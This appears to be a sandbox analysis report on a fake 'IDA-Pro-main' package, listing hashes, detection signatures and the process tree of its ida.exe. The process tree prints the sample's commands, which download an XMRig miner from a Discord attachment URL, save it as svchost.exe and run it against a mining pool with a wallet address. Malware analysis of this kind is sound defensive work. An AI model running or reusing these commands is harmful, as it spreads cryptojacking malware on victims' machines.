Overview

overview

10

Static

static

10

IDA-Pro-ma...re.dll

windows7-x64

1

IDA-Pro-ma...re.dll

windows10-2004-x64

1

IDA-Pro-ma...ui.dll

windows7-x64

1

IDA-Pro-ma...ui.dll

windows10-2004-x64

1

IDA-Pro-ma...rt.dll

windows7-x64

1

IDA-Pro-ma...rt.dll

windows10-2004-x64

1

IDA-Pro-ma...ts.dll

windows7-x64

1

IDA-Pro-ma...ts.dll

windows10-2004-x64

1

IDA-Pro-ma...64.dll

windows7-x64

1

IDA-Pro-ma...64.dll

windows10-2004-x64

1

IDA-Pro-ma...server

debian-12-armhf

IDA-Pro-ma...rver64

ubuntu-18.04-amd64

IDA-Pro-ma...rver64

debian-9-armhf

IDA-Pro-ma...rver64

debian-9-mips

IDA-Pro-ma...rver64

debian-9-mipsel

IDA-Pro-ma...server

ubuntu-24.04-amd64

IDA-Pro-ma...server

ubuntu-24.04-amd64

IDA-Pro-ma...server

debian-9-armhf

3

IDA-Pro-ma...server

ubuntu-24.04-amd64

IDA-Pro-ma...rver64

ubuntu-20.04-amd64

3

IDA-Pro-ma...server

macos-10.15-amd64

1

IDA-Pro-ma...rver64

macos-10.15-amd64

1

IDA-Pro-ma..._arm64

macos-10.15-amd64

1

IDA-Pro-ma...arm64e

macos-10.15-amd64

1

IDA-Pro-ma...te.exe

windows7-x64

3

IDA-Pro-ma...te.exe

windows10-2004-x64

3

IDA-Pro-ma...64.exe

windows7-x64

1

IDA-Pro-ma...64.exe

windows10-2004-x64

1

IDA-Pro-main/ida.dll

windows7-x64

1

IDA-Pro-main/ida.dll

windows10-2004-x64

1

IDA-Pro-main/ida.exe

windows7-x64

7

IDA-Pro-main/ida.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-07-2024 00:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IDA-Pro-main/ida.exe

  • Size

    257KB

  • MD5

    062ed7603d36e3dc4734e52697961972

  • SHA1

    0a254737a34c14e3963e1420d3a039a5b6fab16d

  • SHA256

    0ca0a6d4508bd457a7d3a69d6a43168a96eb896dd89c8473665e5fab05a30a6a

  • SHA512

    68c1583e29ac88575b90b7d4826b8917771c8738afcf7c9e6497a185ba424c3be5e840fe7e4bde8b634d442b9b109c8f8ec00f4ff88800923fb0526e369eec41

  • SSDEEP

    3072:S4OAN18ZH2Mit33scQBFeUSJyFxTY0Nhv6ZsPV3i6e/GDdiyZ9eAM+PwAU2FuIdu:9Sjk33scYFeUSEFxEkhvFZuG5ZnPtuv

Score
7/10
persistencevmprotect

Malware Config

Signatures

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\IDA-Pro-main\ida.exe
    "C:\Users\Admin\AppData\Local\Temp\IDA-Pro-main\ida.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1197348604298403910/1202817866651664404/xmrig.vmp.exe -o "C:\Users\Admin\AppData\Local\svchost.exe" >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\system32\curl.exe
        curl https://cdn.discordapp.com/attachments/1197348604298403910/1202817866651664404/xmrig.vmp.exe -o "C:\Users\Admin\AppData\Local\svchost.exe"
        3⤵
          PID:3256
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\svchost.exe" --background --title svchostmon --url pool.hashvault.pro:80 --user 44ZEJE6ALgPEY6YBMDSWAH88U7dqRU3ZLReuea7jUzAFfgiK5wyRzK6fSYdhQVtkJD7YjKmN3WvT9gfgBwX9bKag9WUmC8G --pass bOPADlc7Ov --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        2⤵
          PID:2632

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\svchost.exe
        Filesize

        36B

        MD5

        a1ca4bebcd03fafbe2b06a46a694e29a

        SHA1

        ffc88125007c23ff6711147a12f9bba9c3d197ed

        SHA256

        c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

        SHA512

        6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

        Download Submit

      • memory/4572-0-0x00007FFA0A6B7000-0x00007FFA0AA29000-memory.dmp

        Filesize

        3.4MB

        Download

      • memory/4572-1-0x00007FFA289B0000-0x00007FFA289B2000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4572-2-0x00007FFA289C0000-0x00007FFA289C2000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4572-3-0x00007FFA0A6B0000-0x00007FFA0AF74000-memory.dmp

        Filesize

        8.8MB

        Download

      • memory/4572-4-0x00007FFA0A6B0000-0x00007FFA0AF74000-memory.dmp

        Filesize

        8.8MB

        Download

      • memory/4572-7-0x00007FFA0A6B7000-0x00007FFA0AA29000-memory.dmp

        Filesize

        3.4MB

        Download

      • memory/4572-8-0x00007FFA0A6B0000-0x00007FFA0AF74000-memory.dmp

        Filesize

        8.8MB

        Download